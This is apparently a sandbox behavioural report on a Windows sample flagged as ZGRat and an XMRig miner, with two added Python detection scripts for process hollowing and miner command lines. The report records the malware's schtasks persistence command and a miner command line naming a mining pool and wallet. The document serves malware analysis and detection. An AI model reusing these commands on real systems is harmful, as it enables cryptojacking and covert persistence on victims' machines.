Analysis
max time kernel: 148s
max time network: 132s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 25/02/2024, 12:17
Behavioral task: behavioral1
Sample: tmp.exe
Resource: win7-20240221-en
General
Target: tmp.exe
Size: 5.0MB
MD5: a3fb2b623f4490ae1979fea68cfe36d6
SHA1: 34bec167e0f95ecc36761f77c93c1229c2c5d1f4
SHA256: 3bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56
SHA512: 370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912
SSDEEP: 98304:xrd0tlZ+I89l7cGcGI4G/Mul2rq/aReDkizMeQUz4:x+tlQ4zGk/Mul2rVe4iwVU
Malware Config
Signatures
Detect ZGRat V1 (4 IoCs)
resource  yara_rule
behavioral1/memory/1632-0-0x0000000000110000-0x0000000000614000-memory.dmp  family_zgrat_v1
behavioral1/files/0x000a0000000122b8-15.dat  family_zgrat_v1
behavioral1/memory/3020-19-0x0000000000DE0000-0x00000000012E4000-memory.dmp  family_zgrat_v1
behavioral1/files/0x000a0000000122b8-47.dat  family_zgrat_v1

XMRig Miner payload (8 IoCs)
resource  yara_rule
behavioral1/memory/2180-32-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
behavioral1/memory/2180-34-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
behavioral1/memory/2180-35-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
behavioral1/memory/2180-37-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
behavioral1/memory/2180-36-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
behavioral1/memory/2180-38-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
behavioral1/memory/2180-39-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
behavioral1/memory/2180-43-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig

Executes dropped EXE (1 IoCs)
pid  Process
3020  .exe

Loads dropped DLL (2 IoCs)
pid  Process
1680  cmd.exe
1680  cmd.exe

UPX-packed memory regions (yara rule upx; 13 IoCs, all in the same region of PID 2180)
resource  yara_rule
behavioral1/memory/2180-23-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
behavioral1/memory/2180-24-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
behavioral1/memory/2180-27-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
behavioral1/memory/2180-28-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
behavioral1/memory/2180-30-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
behavioral1/memory/2180-32-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
behavioral1/memory/2180-34-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
behavioral1/memory/2180-35-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
behavioral1/memory/2180-37-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
behavioral1/memory/2180-36-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
behavioral1/memory/2180-38-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
behavioral1/memory/2180-39-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
behavioral1/memory/2180-43-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
Uses the VBS compiler for execution (1 TTPs)
The compiler in question is vbc.exe, the Visual Basic .NET compiler shipped with the .NET Framework, here started from the dropped .exe with miner arguments (see the Processes section).

Suspicious use of SetThreadContext (1 IoCs)
description  pid  Process  procid_target
PID 3020 set thread context of 2180  3020  .exe  36

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid  Process
2556  schtasks.exe

Delays execution with timeout.exe (1 IoCs)
pid  Process
2996  timeout.exe

Suspicious behavior: EnumeratesProcesses (1 IoCs)
pid  Process
3020  .exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
description  pid  Process
Token: SeDebugPrivilege  1632  tmp.exe
Token: SeDebugPrivilege  3020  .exe
Token: SeLockMemoryPrivilege  2180  vbc.exe
Token: SeLockMemoryPrivilege  2180  vbc.exe

Suspicious use of FindShellTrayWindow (1 IoCs)
pid  Process
2180  vbc.exe

Suspicious use of WriteProcessMemory (22 IoCs; identical rows collapsed, repeat count in brackets)
description  pid  Process  procid_target
PID 1632 wrote to memory of 1680  1632  tmp.exe  28  [x3]
PID 1680 wrote to memory of 2996  1680  cmd.exe  30  [x3]
PID 1680 wrote to memory of 3020  1680  cmd.exe  31  [x3]
PID 3020 wrote to memory of 2624  3020  .exe  32  [x3]
PID 2624 wrote to memory of 2556  2624  cmd.exe  34  [x3]
PID 3020 wrote to memory of 2180  3020  .exe  36  [x7]

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
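Read together, the SetThreadContext, WriteProcessMemory and YARA memory tables above describe process hollowing: PID 3020 (the dropped .exe) writes into the freshly created vbc.exe (PID 2180) seven times, then sets its thread context, and both the xmrig and upx rules fire on a region of PID 2180 that starts at 0x140000000, which is the MSVC linker's default image base for 64-bit executables, i.e. a complete PE mapped at its preferred base inside the compiler host. The SeLockMemoryPrivilege taken by PID 2180 fits the same picture (XMRig requests it for large pages). The Python below is an added example, not tooling from the sandbox vendor or the report: it parses the three tables (pasted as text; the YARA table is a representative subset of the rows above), rebuilds the parent/child tree from the memory-write events and reports the hollowed host. The list of rule names treated as suspicious and the assumption that the first process writing into a new child is its creator are mine.

```python
import re
from collections import Counter, defaultdict

# Constructed input: rows copied from the report's signature tables, one per
# line, so the correlation can run offline.
WPM_TEXT = """
PID 1632 wrote to memory of 1680 1632 tmp.exe 28
PID 1632 wrote to memory of 1680 1632 tmp.exe 28
PID 1632 wrote to memory of 1680 1632 tmp.exe 28
PID 1680 wrote to memory of 2996 1680 cmd.exe 30
PID 1680 wrote to memory of 2996 1680 cmd.exe 30
PID 1680 wrote to memory of 2996 1680 cmd.exe 30
PID 1680 wrote to memory of 3020 1680 cmd.exe 31
PID 1680 wrote to memory of 3020 1680 cmd.exe 31
PID 1680 wrote to memory of 3020 1680 cmd.exe 31
PID 3020 wrote to memory of 2624 3020 .exe 32
PID 3020 wrote to memory of 2624 3020 .exe 32
PID 3020 wrote to memory of 2624 3020 .exe 32
PID 2624 wrote to memory of 2556 2624 cmd.exe 34
PID 2624 wrote to memory of 2556 2624 cmd.exe 34
PID 2624 wrote to memory of 2556 2624 cmd.exe 34
PID 3020 wrote to memory of 2180 3020 .exe 36
PID 3020 wrote to memory of 2180 3020 .exe 36
PID 3020 wrote to memory of 2180 3020 .exe 36
PID 3020 wrote to memory of 2180 3020 .exe 36
PID 3020 wrote to memory of 2180 3020 .exe 36
PID 3020 wrote to memory of 2180 3020 .exe 36
PID 3020 wrote to memory of 2180 3020 .exe 36
"""
STC_TEXT = "PID 3020 set thread context of 2180 3020 .exe 36"
MEM_TEXT = """
behavioral1/memory/1632-0-0x0000000000110000-0x0000000000614000-memory.dmp family_zgrat_v1
behavioral1/memory/3020-19-0x0000000000DE0000-0x00000000012E4000-memory.dmp family_zgrat_v1
behavioral1/memory/2180-23-0x0000000140000000-0x00000001407DC000-memory.dmp upx
behavioral1/memory/2180-32-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig
behavioral1/memory/2180-43-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig
"""

WPM_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \d+ (\S+) \d+")
STC_RE = re.compile(r"PID (\d+) set thread context of (\d+) \d+ (\S+) \d+")
MEM_RE = re.compile(r"memory/(\d+)-\d+-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp (\S+)")

DEFAULT_X64_IMAGE_BASE = 0x140000000  # MSVC linker default /BASE for 64-bit EXEs


def parse_edges(text, pattern):
    """Counter of (source_pid, target_pid, source_image), keeping repeat counts."""
    edges = Counter()
    for line in text.strip().splitlines():
        m = pattern.search(line)
        if m:
            edges[(int(m.group(1)), int(m.group(2)), m.group(3))] += 1
    return edges


def parse_memory_hits(text):
    """pid -> {(region_start, region_end): set of YARA rule names}."""
    hits = defaultdict(dict)
    for line in text.strip().splitlines():
        m = MEM_RE.search(line)
        if m:
            region = (int(m.group(2), 16), int(m.group(3), 16))
            hits[int(m.group(1))].setdefault(region, set()).add(m.group(4))
    return hits


def parent_map(wpm):
    """child pid -> (parent pid, parent image). Assumption: the first process
    that writes into a new child is the one that created it."""
    parents = {}
    for (src, dst, name) in wpm:  # Counter keeps insertion order
        parents.setdefault(dst, (src, name))
    return parents


def lineage(pid, parents):
    """Root-to-leaf chain of pids ending at pid."""
    chain = [pid]
    while chain[-1] in parents:
        chain.append(parents[chain[-1]][0])
    return chain[::-1]


def find_hollowed(stc, mem_hits, wpm, suspicious_rules=("xmrig",)):
    """Correlate each SetThreadContext target with suspicious YARA hits in its memory."""
    findings = []
    for (injector, host, injector_image) in stc:
        writes = sum(n for (s, d, _), n in wpm.items() if s == injector and d == host)
        for region, rules in mem_hits.get(host, {}).items():
            if rules & set(suspicious_rules):
                findings.append({
                    "host": host,
                    "injector": injector,
                    "injector_image": injector_image,
                    "write_count": writes,
                    "region": region,
                    "rules": sorted(rules),
                    "at_default_image_base": region[0] == DEFAULT_X64_IMAGE_BASE,
                    "lineage": lineage(host, parent_map(wpm)),
                })
    return findings


def analyse():
    wpm = parse_edges(WPM_TEXT, WPM_RE)
    stc = parse_edges(STC_TEXT, STC_RE)
    return find_hollowed(stc, parse_memory_hits(MEM_TEXT), wpm)


if __name__ == "__main__":
    for f in analyse():
        print("hollowed host PID %d (%s wrote %d times, region 0x%X-0x%X, rules %s, chain %s)"
              % (f["host"], f["injector_image"], f["write_count"], f["region"][0],
                 f["region"][1], "+".join(f["rules"]), " > ".join(map(str, f["lineage"]))))
```

On a real case the same correlation applies to any process-creation plus injection telemetry (Sysmon event IDs 1, 8 and 10, or EDR equivalents): a child whose first writer also sets its thread context, and whose memory then carries a foreign PE at the default image base, is the process to dump and the one to kill first.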
Processes
(depth in brackets; each entry gives image, command line, PID and the signatures it triggered)

[1] C:\Users\Admin\AppData\Local\Temp\tmp.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    PID: 1632
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\cmd.exe
      command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1DEC.tmp.bat""
      PID: 1680
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\timeout.exe
        command line: timeout 3
        PID: 2996
        - Delays execution with timeout.exe
    [3] C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        command line: "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        PID: 3020
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\cmd.exe
          command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
          PID: 2624
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\schtasks.exe
            command line: schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
            PID: 2556
            - Creates scheduled task(s)
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
          command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
          PID: 2180
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of FindShellTrayWindow

[1] C:\Windows\system32\taskeng.exe
    command line: taskeng.exe {5438764F-EE42-4117-AC69-329AEAA01316} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]
    PID: 640
  [2] C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
      command line: C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
      PID: 1160
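Three things in the process tree above are worth turning into detections: an executable with an empty file stem under C:\ProgramData (the dropped .exe), a schtasks /create with a MINUTE trigger and /RL HIGHEST whose target lives in a user-writable directory, and vbc.exe (a compiler) started with XMRig-style miner arguments (-o pool:port, -u wallet, -a rx/0, --donate-level). The second taskeng.exe branch shows the task firing, so the persistence is live in the sandbox. The Python below is an added example, not part of the report and not the sandbox's own logic: it runs those three checks over constructed Sysmon-style process-creation records that mirror the tree (image paths and command lines copied from the report, PPIDs follow the tree). The benign vbc.exe compile at the end, the COMPILER_HOSTS list and the wallet-length threshold are assumptions of mine, not observations from the report.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed records mirroring the report's process tree. The final record is
# a benign compiler invocation added as a control; it is not in the report.
SAMPLE_EVENTS = [
    ProcEvent(1632, 0, r"C:\Users\Admin\AppData\Local\Temp\tmp.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\tmp.exe"'),
    ProcEvent(1680, 1632, r"C:\Windows\system32\cmd.exe",
              r'cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1DEC.tmp.bat""'),
    ProcEvent(2996, 1680, r"C:\Windows\system32\timeout.exe", "timeout 3"),
    ProcEvent(3020, 1680, r"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe",
              r'"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"'),
    ProcEvent(2624, 3020, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"'),
    ProcEvent(2556, 2624, r"C:\Windows\system32\schtasks.exe",
              r'schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"'),
    ProcEvent(2180, 3020, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe",
              r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl"),
    ProcEvent(4100, 4000, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe",
              r"vbc.exe /target:library /out:Foo.dll Foo.vb"),
]

# Legitimate compilers that should never carry miner arguments. vbc.exe is the
# host seen in the report; csc.exe is added by assumption.
COMPILER_HOSTS = {"vbc.exe", "csc.exe"}
POOL_RE = re.compile(r"[\w.\-]+:\d{2,5}")  # host:port as passed to -o / --url


def miner_hits(tokens):
    """Return which XMRig-style option pairs appear in a tokenised command line."""
    hits = set()
    for i, t in enumerate(tokens):
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if t in ("-o", "--url") and POOL_RE.fullmatch(nxt):
            hits.add("pool")
        elif t in ("-u", "--user") and len(nxt) >= 40:  # wallet addresses are long
            hits.add("wallet")
        elif t in ("-a", "--algo") and nxt.startswith("rx/"):  # RandomX family
            hits.add("randomx")
        elif t.startswith("--donate-level"):
            hits.add("donate")
    return hits


def classify(ev):
    """Set of indicator tags for one process-creation event."""
    tags = set()
    tokens = ev.cmdline.split()
    low = [t.lower().strip('"') for t in tokens]
    base = PureWindowsPath(ev.image).name.lower()

    if base == ".exe":  # empty file stem, as in ProgramData\...\.exe
        tags.add("nameless_exe")

    hits = miner_hits(tokens)
    if "pool" in hits and len(hits) >= 2:  # pool plus at least one more miner option
        tags.add("xmrig_cli")
        if base in COMPILER_HOSTS:
            tags.add("compiler_hosting_miner")

    if ("schtasks" in low or base == "schtasks.exe") and "/create" in low:
        # map each /switch to the token that follows it
        opts = {low[i]: low[i + 1] for i in range(len(low) - 1) if low[i].startswith("/")}
        if opts.get("/sc") == "minute" and opts.get("/rl") == "highest":
            tags.add("schtasks_minute_highest")
        target = opts.get("/tr", "")
        if "\\programdata\\" in target or "\\appdata\\" in target:
            tags.add("task_runs_from_user_writable_dir")
    return tags


def scan(events):
    """pid -> sorted tags, for every event that triggered at least one rule."""
    out = {}
    for ev in events:
        tags = classify(ev)
        if tags:
            out[ev.pid] = sorted(tags)
    return out


if __name__ == "__main__":
    for pid, tags in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(tags))
```

The miner rule deliberately requires the pool option plus one more XMRig-style option rather than matching on a process name, because the binary here is the legitimately signed vbc.exe and only its arguments and its parent give it away; the benign compile record produces no tags, which is the false-positive case to keep checking when the rule is tuned.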
Network
MITRE ATT&CK Enterprise v15
Downloads
File 1
Filesize: 3.3MB
MD5: 8e312940aa7e62ae8a56bb16613d1d07
SHA1: 73bf7f0b16127dfdc17d1c4874d1b65a88713b54
SHA256: 3588ef38f810c654be12daace323bd44096347ac092ea2448c2d1f204c8d1e65
SHA512: 9fb4b4541ffb7a1da0c2361b240b60eb5c77ad41629b392137361c83c59980d9eeb7b63808de4c7590ae5bcbc76e76862065009d82ce4ad556110d60ac4b3183

File 2
Filesize: 168B
MD5: 17f9019d5e0e548c6433b4440383b5e3
SHA1: 52790dcb6638f34613cd28a555e8a4f960ff0f3c
SHA256: f3c39897f68e63b77da5f7db84da0204de490a606c97f8cc3d0151545cda451f
SHA512: fa39e4cdb3f7a882237d2a491aca0fbb0efc1890a4f050ea2890aa997d0afcd5e3bf2e0079127974472dba75eb1d5e7828b6ffa0da8fd93b4d2870597679dc59

File 3 (same hashes as the submitted sample tmp.exe)
Filesize: 5.0MB
MD5: a3fb2b623f4490ae1979fea68cfe36d6
SHA1: 34bec167e0f95ecc36761f77c93c1229c2c5d1f4
SHA256: 3bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56
SHA512: 370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912